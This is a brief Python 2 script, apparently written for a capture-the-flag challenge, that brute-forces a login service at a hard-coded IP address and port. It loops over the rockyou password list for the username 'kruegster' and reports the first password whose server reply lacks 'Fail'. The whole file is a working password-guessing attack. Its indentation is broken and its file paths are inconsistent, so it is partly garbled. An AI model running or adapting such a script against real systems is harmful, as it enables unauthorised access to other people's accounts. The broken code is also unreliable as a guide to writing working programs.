import socket
import re
import sys

host = '142.93.117.193'
port = 1337
wordlist= "/Downloads/rockyou.txt"

def brute_force(username,pswd):

    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print "Trying "+username+": "+pswd
    s.connect((host,port))
    data = s.recv(1024)
    	print(str(data))
    s.send(username + '\n')
    data = s.recv(1024)
    	print(str(data))
    s.send(pswd + '\n')
    data = s.recv(1024)
    	print(str(data))
    s.close()
    return str(data)
username = "kruegster"

with open("rockyou.txt") as f:
    for pswd in f:
            	result = brute_force(username, pswd)
            	print(result)
   	 if "Fail" not in result:
   		 print "Password Found: "+pswd
   		 sys.exit(0)
